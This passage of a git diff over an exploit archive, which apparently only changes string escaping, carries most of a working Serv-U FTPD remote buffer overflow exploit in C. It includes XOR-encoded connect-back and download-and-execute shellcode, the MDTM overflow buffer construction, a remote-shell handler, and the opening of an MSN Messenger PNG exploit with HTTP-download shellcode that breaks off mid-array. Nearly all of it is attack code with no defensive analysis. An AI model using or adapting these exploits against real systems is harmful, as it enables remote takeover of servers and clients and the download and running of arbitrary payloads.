+\"\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\\x12\\x65\\xF3\\x8D\\xC0\\x10\\x9D\\x16\"
+\"\\x7B\\x62\\x5F\\xDE\\x89\\xDD\\x67\\xDE\\xA5\\x67\\xDE\\xA4\\x10\\xC6\\xD1\\x10\"
+\"\\xC6\\xD5\\x10\\xC6\\xC9\\x14\\xDD\\xBD\\x89\\xCE\\xC9\\xC8\\xC8\\xC8\\xF3\\x98\"
+\"\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\\xCF\\x9D\\x12\\x55\\xF3\\x66\\x66\\xA8\\x66\"
+\"\\xCF\\x91\\x72\\x9E\\x09\\x09\\x09\\x09\\x09\\x09\\x09\\xCA\\x66\\xCF\\xB1\\x66\"
+\"\\xCF\\x95\\xC8\\xCF\\x12\\xEC\\xA5\\x12\\xED\\xB7\\xE1\\x9A\\x6C\\xCF\\x12\\xEF\"
+\"\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\\x89\\xA3\"
+\"\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\\x7E\\xC7\"
+\"\\x12\\xC7\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC7\\x85\\x9A\\x44\\x12\\x9D\"
+\"\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x40\\x67\\x66\\x66\\x17\\xD7\\x97\\x75\"
+\"\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\xE7\\x41\\x7B\\xEA\\x52\\x74\\x65\\xA2\"
+\"\\x40\\x90\\x6C\\x34\\x75\\x6B\\xCC\\x59\\x3D\\x83\\xE9\\x5E\\x3D\\x34\\xB7\\x70\"
+\"\\x7C\\xD0\\x1F\\xD0\\x7E\\xE0\\x5F\\xE0\";
 
 // 304 bytes connectback shellcode by lion for Serv-U (xor with 0x99)
 unsigned char cbsc[]=
-"\x70\x9C\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
-"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x05\x99\x99\x99"
-"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12"
-"\x71\xF3\x9D\xC0\x71\x1A\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99"
-"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98"
-"\xF3\x9B\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x99"
-"\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD2\xAA\x59"
-"\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x89\xC0"
-"\x10\x9D\x16\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10"
-"\xC6\xD1\x10\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8"
-"\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66"
-"\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xEC"
-"\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF\xB9\x9A\x6C\x72\x9E\x09"
-"\x09\x09\x09\x09\x09\x09\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96"
-"\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86"
-"\xEC\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A"
-"\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x6F\x67\x66\x66\x17"
-"\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52"
-"\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0\x99";
+\"\\x70\\x9C\\x98\\x99\\x99\\xC6\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
+\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\\x9D\\xC0\\x71\\x05\\x99\\x99\\x99\"
+\"\\x7B\\x60\\xF1\\xAA\\xAB\\x99\\x99\\xF1\\xEE\\xEA\\xAB\\xC6\\xCD\\x66\\x8F\\x12\"
+\"\\x71\\xF3\\x9D\\xC0\\x71\\x1A\\x99\\x99\\x99\\x7B\\x60\\x18\\x75\\x09\\x98\\x99\"
+\"\\x99\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCF\\x89\\xC9\\xC9\\xC9\\xC9\\xF3\\x98\"
+\"\\xF3\\x9B\\x66\\xCF\\x8D\\x12\\x41\\xF1\\xE6\\x99\\x99\\x98\\xF1\\x9B\\x99\\x99\"
+\"\\xAC\\x12\\x55\\xF3\\x89\\xC8\\xCA\\x66\\xCF\\x81\\x1C\\x59\\xEC\\xD2\\xAA\\x59\"
+\"\\xF1\\xFA\\xF4\\xFD\\x99\\x10\\xFF\\xA9\\x1A\\x75\\xCD\\x12\\x65\\xF3\\x89\\xC0\"
+\"\\x10\\x9D\\x16\\x7B\\x62\\x5F\\xDE\\x89\\xDD\\x67\\xDE\\xA5\\x67\\xDE\\xA4\\x10\"
+\"\\xC6\\xD1\\x10\\xC6\\xD5\\x10\\xC6\\xC9\\x14\\xDD\\xBD\\x89\\xCE\\xC9\\xC8\\xC8\"
+\"\\xC8\\xF3\\x98\\xC8\\xC8\\x66\\xEF\\xA9\\xC8\\x66\\xCF\\x9D\\x12\\x55\\xF3\\x66\"
+\"\\x66\\xA8\\x66\\xCF\\x91\\xCA\\x66\\xCF\\x85\\x66\\xCF\\x95\\xC8\\xCF\\x12\\xEC\"
+\"\\xA5\\x12\\xED\\xB7\\xE1\\x9A\\x6C\\xCF\\x12\\xEF\\xB9\\x9A\\x6C\\x72\\x9E\\x09\"
+\"\\x09\\x09\\x09\\x09\\x09\\x09\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\"
+\"\\x27\\x89\\xA3\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\"
+\"\\xEC\\x7E\\xC7\\x12\\xC7\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC7\\x85\\x9A\"
+\"\\x44\\x12\\x9D\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\x6F\\x67\\x66\\x66\\x17\"
+\"\\xD7\\x97\\x75\\xEB\\x67\\x2A\\x8F\\x34\\x40\\x9C\\x57\\xE7\\x41\\x7B\\xEA\\x52\"
+\"\\x74\\x65\\xA2\\x40\\x90\\x6C\\x34\\x75\\x60\\x33\\xF9\\x7E\\xE0\\x5F\\xE0\\x99\";
 
 // 194 bytes download url file and exec shellcode by lion (xor with 0x99)
 // Tested on Serv-U 3.x/4.x/5.x
 unsigned char dusc[]=
-"\x70\x3D\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12"
-"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\xDD\x99\x99\x99"
-"\x7B\x60\xF1\xF6\xF7\x99\x99\xF1\xEC\xEB\xF5\xF4\xCD\x66\x8F\x12"
-"\x71\x71\xB7\x99\x99\x99\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCF"
-"\x9D\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99"
-"\xAA\x59\xC9\xC9\xCA\xCE\xC9\x66\xCF\x89\x12\x45\xC9\xCA\x66\xCF"
-"\x91\x66\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF"
-"\x12\xEF\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27"
-"\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC"
-"\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44"
-"\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\xCE\x66\x66\x66\x17\xD7"
-"\x97\x75\x58\xE0\x7C\x21\x01\x67\x13\x97\xE7\x41\x7B\xEA\xAF\x83"
-"\xB6\xE9";
+\"\\x70\\x3D\\x99\\x99\\x99\\xC6\\xFD\\x38\\xA9\\x99\\x99\\x99\\x12\\xD9\\x95\\x12\"
+\"\\xE9\\x85\\x34\\x12\\xF1\\x91\\x12\\x6E\\xF3\\x9D\\xC0\\x71\\xDD\\x99\\x99\\x99\"
+\"\\x7B\\x60\\xF1\\xF6\\xF7\\x99\\x99\\xF1\\xEC\\xEB\\xF5\\xF4\\xCD\\x66\\x8F\\x12\"
+\"\\x71\\x71\\xB7\\x99\\x99\\x99\\x1A\\x75\\xB9\\x12\\x45\\xF3\\xB9\\xCA\\x66\\xCF\"
+\"\\x9D\\x5E\\x9D\\x9A\\xC5\\xF8\\xB7\\xFC\\x5E\\xDD\\x9A\\x9D\\xE1\\xFC\\x99\\x99\"
+\"\\xAA\\x59\\xC9\\xC9\\xCA\\xCE\\xC9\\x66\\xCF\\x89\\x12\\x45\\xC9\\xCA\\x66\\xCF\"
+\"\\x91\\x66\\xCF\\x95\\xC8\\xCF\\x12\\xEC\\xA5\\x12\\xED\\xB7\\xE1\\x9A\\x6C\\xCF\"
+\"\\x12\\xEF\\xB9\\x9A\\x6C\\xAA\\x50\\xD0\\xD8\\x34\\x9A\\x5C\\xAA\\x42\\x96\\x27\"
+\"\\x89\\xA3\\x4F\\xED\\x91\\x58\\x52\\x94\\x9A\\x43\\xD9\\x72\\x68\\xA2\\x86\\xEC\"
+\"\\x7E\\xC7\\x12\\xC7\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC7\\x85\\x9A\\x44\"
+\"\\x12\\x9D\\x12\\x9A\\x5C\\x32\\xC7\\xC0\\x5A\\x71\\xCE\\x66\\x66\\x66\\x17\\xD7\"
+\"\\x97\\x75\\x58\\xE0\\x7C\\x21\\x01\\x67\\x13\\x97\\xE7\\x41\\x7B\\xEA\\xAF\\x83\"
+\"\\xB6\\xE9\";
 
 // exec file url addr for download url file and exec shellcode
-unsigned char downloadurl[255]= "";
+unsigned char downloadurl[255]= \"\";
 
 
 void showtype()
 {
     int i;
 //    usage(p);
-    printf( "[Type]:\n");
+    printf( \"[Type]:\\n\");
     for(i=0;i<sizeof(targets)/sizeof(v);i++)
     {
-        printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
+        printf(\"\\t%d\\t0x%x\\t%s\\n\", i, targets[i].dwJMP, targets[i].szDescription);
     }
 }
 
 void usage(char *p)
 {
-    printf( "Usage:\t%s\t-i <ip> [Options]\n"
-        "\t\t-t\tShow All Target Type.\n\n"
-        "[Options:]\n"
-        "\t-i\tTarget IP                     Required\n"
-        "\t-t\tTarget Type                   Default: %d\n"
-        "\t-u\tFTP Username                  Default: %s\n"
-        "\t-p\tFTP Password                  Default: %s\n"
-        "\t-f\tPort of the FTP Server        Default: %d\n"
-        "\t-s\tPort of the Shell             Default: %d\n"
-        "\t-c\tConnect back IP               For connectback shellcode\n"
-        "\t-d\tDownload the URL and Exec     Start with 'http://' or 'ftp://'\n\n"
+    printf( \"Usage:\\t%s\\t-i <ip> [Options]\\n\"
+        \"\\t\\t-t\\tShow All Target Type.\\n\\n\"
+        \"[Options:]\\n\"
+        \"\\t-i\\tTarget IP                     Required\\n\"
+        \"\\t-t\\tTarget Type                   Default: %d\\n\"
+        \"\\t-u\\tFTP Username                  Default: %s\\n\"
+        \"\\t-p\\tFTP Password                  Default: %s\\n\"
+        \"\\t-f\\tPort of the FTP Server        Default: %d\\n\"
+        \"\\t-s\\tPort of the Shell             Default: %d\\n\"
+        \"\\t-c\\tConnect back IP               For connectback shellcode\\n\"
+        \"\\t-d\\tDownload the URL and Exec     Start with \'http://\' or \'ftp://\'\\n\\n\"
         , p, DEFTYPE, DEFUSER, DEFPASS, FTPPORT, SHELLPORT);    
 
     //showtype();
@@ -297,13 +297,13 @@ void shell (int sock)
             l = recv (sock, buf, sizeof (buf), 0);
             if (l <= 0)
             {
-                printf ("[-] Connection closed.\n");
+                printf (\"[-] Connection closed.\\n\");
                 return;
             }
             l = write (1, buf, l);
             if (l <= 0)
             {
-                printf ("[-] Connection closed.\n");
+                printf (\"[-] Connection closed.\\n\");
                 return;
             }
         }
@@ -312,13 +312,13 @@ void shell (int sock)
             l = read (0, buf, sizeof (buf));
             if (l <= 0)
             {
-                printf("[-] Connection closed.\n");
+                printf(\"[-] Connection closed.\\n\");
                 return;
             }
             l = send(sock, buf, l, 0);
             if (l <= 0)
             {
-                printf("[-] Connection closed.\n");
+                printf(\"[-] Connection closed.\\n\");
                 return;
             }
         }
@@ -344,9 +344,9 @@ int main(int argc, char **argv)
     unsigned int    timeout=5000, Reuse;
     char    penetrate[255],cbHost2[20];
     
-    printf( "Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V%s (2004-01-07)\r\n"
-        "Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)\r\n"
-        "Welcome to HUC website http://www.cnhonker.com\r\n\n"
+    printf( \"Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V%s (2004-01-07)\\r\\n\"
+        \"Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)\\r\\n\"
+        \"Welcome to HUC website http://www.cnhonker.com\\r\\n\\n\"
              , VERSION);
 
     if(argc < 2)
@@ -354,7 +354,7 @@ int main(int argc, char **argv)
         usage(argv[0]);
         return 1;
     }
-    else if(argc == 2 && argv[1][1] == 't')
+    else if(argc == 2 && argv[1][1] == \'t\')
     {
         showtype();
         return 1;
@@ -375,29 +375,29 @@ int main(int argc, char **argv)
         }
         switch(argv[i][1])
         {
-            case 'i':
+            case \'i\':
                 ip=argv[i+1];
                 break;
-            case 't':
+            case \'t\':
                 iType = atoi(argv[i+1]);
                 break;
-            case 'f':
+            case \'f\':
                 iPort=atoi(argv[i+1]);
                 break;
-            case 'p':
+            case \'p\':
                 pPass = argv[i+1];
                 break;
-            case 'u':
+            case \'u\':
                 pUser=argv[i+1];
                 break;
-            case 's':
+            case \'s\':
                 shport=atoi(argv[i+1]);
                 break;
-            case 'c':
+            case \'c\':
                 cbHost=argv[i+1];
                 bCb=TRUE;
                 break;
-            case 'd':
+            case \'d\':
                 url = argv[i+1];
                 bUrl=TRUE;
                 break;
@@ -408,48 +408,48 @@ int main(int argc, char **argv)
     if((!ip) || (!user) || (!pass))
     {
         usage(argv[0]);
-        printf("[-] Invalid parameter.\n");
+        printf(\"[-] Invalid parameter.\\n\");
         return -1;
     }
 
     if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
     {
         usage(argv[0]);
-        printf("[-] Invalid type.\n");
+        printf(\"[-] Invalid type.\\n\");
         return -1;
     }
 
     if(iPort <1 || iPort >65535 || shport <1 || shport > 65535)
     {
         usage(argv[0]);
-        printf("[-] Invalid port.\n");
+        printf(\"[-] Invalid port.\\n\");
         return -1;
     }
 
     if(bUrl)
     {
-        if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 255)
+        if( (!strstr(url, \"http://\") &&  !strstr(url, \"ftp://\")) || strlen(url) < 10 || strlen(url) > 255)
         {
             usage(argv[0]);
-            printf("[-] Invalid url. Must start with 'http://','ftp://' and <255 bytes.\n");
+            printf(\"[-] Invalid url. Must start with \'http://\',\'ftp://\' and <255 bytes.\\n\");
             return -1;                
         }
     }
     
-    if(strstr(targets[iType].szDescription, "2.x"))
+    if(strstr(targets[iType].szDescription, \"2.x\"))
     {
         b2x = TRUE;
-        printf("[*] Attack Target is Serv-U 2.x.\r\n");
+        printf(\"[*] Attack Target is Serv-U 2.x.\\r\\n\");
     }
     else
     {
-        printf("[*] Attack Target is Serv-U 3.x/4.x/5.x.\r\n");
+        printf(\"[*] Attack Target is Serv-U 3.x/4.x/5.x.\\r\\n\");
     }
     
-    _snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
-    user[sizeof(user)-1]='\0';
-    _snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
-    pass[sizeof(pass)-1]='\0';
+    _snprintf(user, sizeof(user)-1, \"USER %s\\r\\n\", pUser);
+    user[sizeof(user)-1]=\'\\0\';
+    _snprintf(pass, sizeof(pass)-1, \"PASS %s\\r\\n\", pPass);
+    pass[sizeof(pass)-1]=\'\\0\';
     szSend[0] = user;    //user
     szSend[1] = pass;    //pass    
     szSend[2] = penetrate;    //pentrate
@@ -461,26 +461,26 @@ int main(int argc, char **argv)
         strncpy(cbHost2, cbHost, 20);
         for(i=0;i<strlen(cbHost); i++)
         {
-            if(cbHost[i] == '.')
-                cbHost2[i] = ',';
+            if(cbHost[i] == \'.\')
+                cbHost2[i] = \',\';
         }
         
-        sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
+        sprintf(penetrate, \"PORT %s,%d,%d\\r\\n\", cbHost2, shport/256, shport%256);
 
-        //printf("%s", penetrate);
+        //printf(\"%s\", penetrate);
     }
     else
     {
-        sprintf(penetrate,"TYPE I\r\n");        
+        sprintf(penetrate,\"TYPE I\\r\\n\");        
     }
 
-    // fill the "MDTM" command
-    strcpy(szCommand, "MDTM 20031111111111+");
+    // fill the \"MDTM\" command
+    strcpy(szCommand, \"MDTM 20031111111111+\");
 
     // fill the egg
     for(i=0; i<SEH_OFFSET; i++)
     {
-        strcat(szCommand, "\x90");
+        strcat(szCommand, \"\\x90\");
     }
 
     // ret addr
@@ -488,7 +488,7 @@ int main(int argc, char **argv)
     {
 
         // fill the egg
-        if(strstr(targets[iType].szDescription, "<"))
+        if(strstr(targets[iType].szDescription, \"<\"))
         {
             j = 8;
         }
@@ -498,7 +498,7 @@ int main(int argc, char **argv)
         }
         for(i=0; i<j; i++)
         {
-            strcat(szCommand, "\x90");
+            strcat(szCommand, \"\\x90\");
         }
         
         memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
@@ -524,12 +524,12 @@ int main(int argc, char **argv)
     }
 
     // fill the space
-    strcat(szCommand, " ");
+    strcat(szCommand, \" \");
 
     // fill the egg
     for(i=0; i<0x10; i++)
     {
-        strcat(szCommand, "\x90");
+        strcat(szCommand, \"\\x90\");
     }
 
     // fill the shellcode start sign
@@ -572,16 +572,16 @@ int main(int argc, char **argv)
     strcat(szCommand, sc_end);
 
     // send end
-    strcat(szCommand, "\r\n");
+    strcat(szCommand, \"\\r\\n\");
 
     if(strlen(szCommand) >= sizeof(szCommand))
     {
-        printf("[-] stack buffer overflow.\n");
+        printf(\"[-] stack buffer overflow.\\n\");
         return -1;
     }
     
-    //printf("send size %d:%s", strlen(szCommand), szCommand);
-    //printf("buffsize %d\r\n", strlen(szCommand)-5-2);
+    //printf(\"send size %d:%s\", strlen(szCommand), szCommand);
+    //printf(\"buffsize %d\\r\\n\", strlen(szCommand)-5-2);
     
 #ifndef UNIX
     __try
@@ -591,14 +591,14 @@ int main(int argc, char **argv)
 #ifndef UNIX
         if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
         {
-            printf("[-] WSAStartup error:%d\n", WSAGetLastError());
+            printf(\"[-] WSAStartup error:%d\\n\", WSAGetLastError());
             __leave;
         }
 #endif
         s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
         if(s == INVALID_SOCKET)
         {
-            printf("[-] Create socket failed:%d",GetLastError());
+            printf(\"[-] Create socket failed:%d\",GetLastError());
             __leave;
         }
 
@@ -614,10 +614,10 @@ int main(int argc, char **argv)
         iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
         if(iErr == SOCKET_ERROR)
         {
-            printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
+            printf(\"[-] Connect to %s:%d error:%d\\n\", ip, iPort, GetLastError());
             __leave;
         }
-        printf("[+] Connect to %s:%d success.\n", ip, iPort);
+        printf(\"[+] Connect to %s:%d success.\\n\", ip, iPort);
         
         if(bCb)
         {
@@ -642,15 +642,15 @@ int main(int argc, char **argv)
 
             if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
             {
-                printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
-                printf("[-] You must run nc get the shell.\n");
+                printf(\"[-] Bind port on %s:%d error.\\n\", cbHost, shport);
+                printf(\"[-] You must run nc get the shell.\\n\");
                 bLocal = FALSE;
                 //closesocket(s2);
                 //__leave;
             }
             else
             {    
-                printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
+                printf(\"[+] Bind port on %s:%d success.\\n\", cbHost, shport);
                 listen(s2, 1);
             }
         }
@@ -661,58 +661,58 @@ int main(int argc, char **argv)
             iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
             if(iErr == SOCKET_ERROR)
             {
-                printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
+                printf(\"[-] Recv buffer error:%d.\\n\", WSAGetLastError());
                 __leave;
             }
-            printf("[+] Recv: %s", szRecvBuff);
+            printf(\"[+] Recv: %s\", szRecvBuff);
             
-            if(szRecvBuff[0] == '5')
+            if(szRecvBuff[0] == \'5\')
             {
-                printf("[-] Server return a error Message.\r\n");
+                printf(\"[-] Server return a error Message.\\r\\n\");
                 __leave;
             }
 
             iErr = send(s, szSend[i], strlen(szSend[i]),0);
             if(iErr == SOCKET_ERROR)
             {
-                printf("[-] Send buffer error:%d.\n", WSAGetLastError());
+                printf(\"[-] Send buffer error:%d.\\n\", WSAGetLastError());
                 __leave;
             }
 
             if(i==sizeof(szSend)/sizeof(szSend[0])-1)
-                printf("[+] Send shellcode %d bytes.\n", iErr);
+                printf(\"[+] Send shellcode %d bytes.\\n\", iErr);
             else
-                printf("[+] Send: %s", szSend[i]);
+                printf(\"[+] Send: %s\", szSend[i]);
         }
 
         if(bUrl)
         {
-            printf("[+] Target Download the file and exec: %s\r\n", url);
-            printf("[+] Success? Maybe!\r\n");
+            printf(\"[+] Target Download the file and exec: %s\\r\\n\", url);
+            printf(\"[+] Success? Maybe!\\r\\n\");
         }
         else
         {
-            printf("[+] If you don't have a shell it didn't work.\n");
+            printf(\"[+] If you don\'t have a shell it didn\'t work.\\n\");
 
             if(bCb)
             {
                 if(bLocal)
                 {
-                    printf("[+] Wait for shell...\n");
+                    printf(\"[+] Wait for shell...\\n\");
             
                     len = sizeof(client);
                     s3 = accept(s2, (struct sockaddr*)&client, &len);
                     if(s3 != INVALID_SOCKET)
                     {
-                        printf("[+] Exploit success! Good luck! :)\n");
-                        printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
+                        printf(\"[+] Exploit success! Good luck! :)\\n\");
+                        printf(\"[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\\n\");
                         shell(s3);
                     }
                 }    
             }
             else
             {
-                printf("[+] Connect to shell...\n");
+                printf(\"[+] Connect to shell...\\n\");
             
                 Sleep(1000);
                 s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
@@ -723,12 +723,12 @@ int main(int argc, char **argv)
                 ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
                 if(ret!=0)
                 {
-                    printf("[-] Exploit seem failed.\n");
+                    printf(\"[-] Exploit seem failed.\\n\");
                     __leave;
                 }
             
-                printf("[+] Exploit success! Good luck! :)\n");
-                printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
+                printf(\"[+] Exploit success! Good luck! :)\\n\");
+                printf(\"[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\\n\");
                 shell(s2);
             }
         }    
diff --git a/platforms/windows/remote/25094.c b/platforms/windows/remote/25094.c
index 35a83d01c..949f2ff78 100755
--- a/platforms/windows/remote/25094.c
+++ b/platforms/windows/remote/25094.c
@@ -38,7 +38,7 @@ Since this issue may be exploited in a client-to-client attack for MSN Messenger
 *
 * After creating vuln png image, open
 * MSN Messenger and select it as your display picture in
-* "Tools->Change Display Picture".
+* \"Tools->Change Display Picture\".
 *
 */
 
@@ -55,28 +55,28 @@ Since this issue may be exploited in a client-to-client attack for MSN Messenger
 #define NOP 0x90
 
 char png_header[] =
-"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\x49\x48\x44\x52"
-"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\x00\x9D\xB7\x81"
-"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";
+\"\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A\\x00\\x00\\x00\\x0D\\x49\\x48\\x44\\x52\"
+\"\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x03\\x00\\x00\\x00\\x9D\\xB7\\x81\"
+\"\\xEC\\x00\\x00\\x01\\xB9\\x74\\x52\\x4E\\x53\";
 
-char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";
+char pngeof[] = \"\\x90\\x90\\x90\\x59\\xE8\\x47\\xFE\\xFF\\xFF\";
 
 /* Generic win32 http download shellcode
    xored with 0x1d by delikon (http://delikon.de/) */
-char shellcode[] = "\xEB"
-"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\x40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
-"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\x1D\x94\xDE\x4D\x75\x93\x53\x13"
-"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\x4C\x75\x68\x6F\x71\x70\x49\xE2"
-"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\x2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
-"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\xF5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
-"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\xF5\x04\x1D\x1D\x1D\xE2\xCD\x48"
-"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\x01\xB0\x96\x75\x15\x94\xF5\x43"
-"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\x21\x96\x49\x18\x65\x1C\xF7\x96"
-"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\x96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
-"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\x26\x61\x39\x09\x68\xFC\x96\x47"
-"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\x96\x19\x96\x1C\xF5\xF4\x1F\x1D"
-"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\x32\xE2\xE2\xE2\x70\x75\x75\x33"
-"\x78\x65\x78\x1D";
+char shellcode[] = \"\\xEB\"
+\"\\x10\\x58\\x31\\xC9\\x66\\x81\\xE9\\x22\\xFF\\x80\\x30\\x1D\\x40\\xE2\\xFA\\xEB\\x05\\xE8\\xEB\\xFF\"
+\"\\xFF\\xFF\\xF4\\xD1\\x1D\\x1D\\x1D\\x42\\xF5\\x4B\\x1D\\x1D\\x1D\\x94\\xDE\\x4D\\x75\\x93\\x53\\x13\"
+\"\\xF1\\xF5\\x7D\\x1D\\x1D\\x1D\\x2C\\xD4\\x7B\\xA4\\x72\\x73\\x4C\\x75\\x68\\x6F\\x71\\x70\\x49\\xE2\"
+\"\\xCD\\x4D\\x75\\x2B\\x07\\x32\\x6D\\xF5\\x5B\\x1D\\x1D\\x1D\\x2C\\xD4\\x4C\\x4C\\x90\\x2A\\x4B\\x90\"
+\"\\x6A\\x15\\x4B\\x4C\\xE2\\xCD\\x4E\\x75\\x85\\xE3\\x97\\x13\\xF5\\x30\\x1D\\x1D\\x1D\\x4C\\x4A\\xE2\"
+\"\\xCD\\x2C\\xD4\\x54\\xFF\\xE3\\x4E\\x75\\x63\\xC5\\xFF\\x6E\\xF5\\x04\\x1D\\x1D\\x1D\\xE2\\xCD\\x48\"
+\"\\x4B\\x79\\xBC\\x2D\\x1D\\x1D\\x1D\\x96\\x5D\\x11\\x96\\x6D\\x01\\xB0\\x96\\x75\\x15\\x94\\xF5\\x43\"
+\"\\x40\\xDE\\x4E\\x48\\x4B\\x4A\\x96\\x71\\x39\\x05\\x96\\x58\\x21\\x96\\x49\\x18\\x65\\x1C\\xF7\\x96\"
+\"\\x57\\x05\\x96\\x47\\x3D\\x1C\\xF6\\xFE\\x28\\x54\\x96\\x29\\x96\\x1C\\xF3\\x2C\\xE2\\xE1\\x2C\\xDD\"
+\"\\xB1\\x25\\xFD\\x69\\x1A\\xDC\\xD2\\x10\\x1C\\xDA\\xF6\\xEF\\x26\\x61\\x39\\x09\\x68\\xFC\\x96\\x47\"
